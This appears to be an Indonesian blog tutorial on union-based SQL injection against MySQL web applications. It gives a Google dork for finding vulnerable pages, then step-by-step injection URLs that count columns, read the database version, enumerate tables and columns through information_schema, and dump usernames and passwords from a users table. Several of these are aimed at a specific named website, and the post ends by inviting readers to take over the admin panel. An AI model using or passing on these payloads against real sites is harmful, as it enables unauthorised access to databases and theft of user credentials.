===========================================================
SQL INJEKSI
===========================================================
pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
===========================================================
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ',-
comments: /*,--
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
inurl:"detail_event.php?e_id="
Langkah I :
===========================================================
Mencari Target yg vuln sql
Tambahkan karakter ' pada akhir site atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/detail_event.php?e_id=189' atau [site]/detail_event.php?e_id=-189
http://www.lawlibrary.org/detail_event.php?e_id=-189
Langkah II :
===========================================================
mencari dan menghitung jlh table yang ada dlm db nya
gunakan perintah : order by
contoh: [site]/detail_event.php?e_id=-189 order by 1-- atau
[site]/detail_event.php?e_id=-189 order by 1/*
ceklah secara step by step...
misal: [site]/detail_event.php?e_id=-189 order by 1--
[site]/detail_event.php?e_id=-189 order by 2--
sehingga muncul error atau hilang pesan error...
misal: [site]/detail_event.php?e_id=-189 order by 12--
berarti yang kita ambil adalah sampai angka 11
menjadi [site]/detail_event.php?e_id=-189 order by 11--
http://www.lawlibrary.org/detail_event.php?e_id=-189 union all select 1,2,3,4,5,6,7,8,9,10,11--
Langkah III :
===========================================================
Melihat angka yg muncul
karena tadi error sampai angka 12
maka: [site]/detail_event.php?e_id=-189 union all select 1,2,3,4,5,6,7,8,9,10,11--
ok seumpama yg keluar angka 4
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/detail_event.php?e_id=-189 union select 1,2,3,version(),5,6,7,8,9,10,11-- atau
[site]/detail_event.php?e_id=-189 union select 1,2,3,@@version,5,6,7,8,9,10,11--
http://www.lawlibrary.org/detail_event.php?e_id=-189 union all select 1,2,3,version(),5,6,7,8,9,10,11--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From Information_schema..
Langkah IV :
===========================================================
Menampilkan table yg ada pada web tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah from information_schema.tables where table_Schema=database()-- >>> dimasukan setelah angka terakhir
[site]/detail_event.php?e_id=-189 union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11 from information_Schema.tables where table_Schema=database()--
seumpama table yang muncul adalah "users"
http://www.lawlibrary.org/detail_event.php?e_id=-189 union all select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11 from information_schema.columns where table_name=database()--
Langkah V :
===========================================================
Menampilkan semua isi dari table tsb ( column )
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah from information_schema.columns where table_name=0xhexa >>> dimasukan setelah angka terakhir
[site]/detail_event.php?e_id=-189 union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11 from information_schema.columns where table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :http://piclist.com/techref/ascii.htm
http://www.industrialtrainer.com/Unicode.shtm
http://www.dolcevie.com/js/converter.html
http://centricle.com/tools/ascii-hex/ [dan lain sebagainya]
contoh kata yg ingin di konversi yaitu users maka akan menjadi 7573657273
[site]/detail_event.php?e_id=-189 union all select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11 from information_schema.columns where table_name=0x7573657273--
http://www.lawlibrary.org/detail_event.php?e_id=-189 union all select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11 from information_schema.columns where table_name=0x7573657273--
Langkah VI :
===========================================================
memunculkan apa yg tadi telah dikeluarkan dari table :
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah from (nama table berasal) >>> dimasukan setelah angka terakhir
contoh :
[site]/detail_event.php?e_id=-189 union all select 1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8,9,10,11 from (nama table berasal)--
contoh kata yang keluar adalah u_username,u_password
[site]/detail_event.php?e_id=-189 union all select 1,2,3,concat_ws(0x3a,u_username,u_password),5,6,7,8,9,10,11 from users--
http://www.lawlibrary.org/detail_event.php?e_id=-189 union all select 1,2,3,concat_ws(0x3a,u_username,u_password),5,6,7,8,9,10,11 from users--
dan lht hasilnya
Langkah VII :
===========================================================
tahap terakhir mencari halam admin atau login
selanjutnya terserah anda karena web ada di tangan anda...
Salam
zhie_o
Label:
Tutorial
Previous Article
Responses
0 Respones to "SQL Injection Tutorial"
Posting Komentar